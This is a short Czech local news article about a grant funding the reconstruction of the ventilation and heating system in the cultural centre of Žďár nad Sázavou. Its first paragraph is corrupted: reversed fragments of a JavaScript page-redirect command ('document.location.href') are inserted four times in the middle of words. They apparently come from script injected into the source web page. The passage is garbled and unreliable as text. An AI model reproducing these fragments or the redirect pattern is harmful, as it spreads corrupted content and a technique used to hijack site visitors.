Rainbow page separator

Rekonstrukci vzduchotechniky v Domě kultury podpoří dotace

Čtvrtek, 25. března 2021

Žďár nad Sázavou / Dotace podpoří rekonstrukci vzduchotechniky v Domě kultury. Začátek stavebních prací, na něž se žďárské radnici podařilo získat bezmála čtyřmilionovou dotační podporu, je naplánovaný na jarní měsíce. Rovněž z důvodu nadcházející rekonstrukce bylo le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos žďárské kulturní centrum vyhodnoceno jako nevhodné pro provoz očkovacího centra. To bylo nakonec zprovozněno v nedaleké spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní hale na Bouchalkách.
Naplánované stavební činnosti v Domě kultury zahrnou především rekonstrukci zastaralé vzduchotechniky v sále, dojde k výměně původního zařízení pro větrání a vytápění sálu a balkonu. Již dlouhá léta nevyužívané větrací zařízení pro předsálí a šatny čeká likvidace, nahradí ho teplovzdušné s filtrací, rekuperací tepla, vodním dohřevem, přímým chlazením a cirkulací vzduchu. Venku za zadní stěnou kulturního domu dojde nad rošty sacích kanálů k osazení osmi kondenzačních jednotek. Taktéž se mimo jiné budou instalovat dvě nové vzduchotechnické jednotky ve strojovně v suterénu.